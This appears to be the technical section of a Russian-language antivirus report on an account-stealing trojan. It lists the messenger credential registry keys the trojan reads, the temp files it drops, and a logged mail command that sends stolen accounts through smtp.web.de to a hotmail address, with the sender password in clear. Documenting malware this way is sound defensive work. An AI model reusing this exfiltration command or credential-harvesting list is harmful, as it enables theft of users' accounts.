Техническая информация
- Диспетчера задач (Taskmgr)
- '%TEMP%\~~0mong355~pdk.tmp' /stext C:\pdk.txt
- '%TEMP%\~~0mong355~http.tmp' /stext C:\http.txt
- '%TEMP%\~~0mong355~smail.tmp' /smtpserver smtp.web.de /to fettemama@hotmail.com /from Universal1337_-_The_Account_Stealer@web.de /subject Accounts /body Accounts are in attachment! /attachment C:\tmp.txt /user Universal1337_-_The_Account_Stealer@web.de /password coach123
- '%TEMP%\~~0mong355.tmp'
- '%TEMP%\~~0mong355~inet.tmp' /stext C:\inet.txt
- '%TEMP%\~~0mong355~msg.tmp' /stext C:\msg.txt
- [<HKCU>\Software\Yahoo\Pager]
- [<HKCU>\Software\AIM\AIMPRO]
- [<HKLM>\Software\Mirabilis\ICQ\NewOwners]
- [<HKCU>\Software\Google\Google Talk\Accounts]
- [<HKCU>\Software\Mirabilis\ICQ\NewOwners]
- [<HKCU>\Software\America Online\AIM6\Passwords]
- [<HKLM>\Software\Miranda]
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Trillian]
- [<HKCU>\Software\Microsoft\MSNMessenger]
- [<HKCU>\Software\Microsoft\IdentityCRL]
- [<HKCU>\Software\Microsoft\MessengerService]
- %TEMP%\~~0mong355~http.tmp
- C:\pdk.txt
- %TEMP%\~~0mong355~pdk.tmp
- %TEMP%\~~0mong355~smail.tmp
- C:\tmp.txt
- C:\http.txt
- %TEMP%\~~0mong355.tmp
- %WINDIR%\tmp.tmp.tmp
- %TEMP%\~~0mong355~msg.tmp
- %TEMP%\~~0mong355~inet.tmp
- C:\err_log.txt
- C:\err_log.txt
- C:\http.txt
- C:\pdk.txt
- 'sm##.web.de':25
- DNS ASK sm##.web.de
- ClassName: 'Shell_TrayWnd' WindowName: ''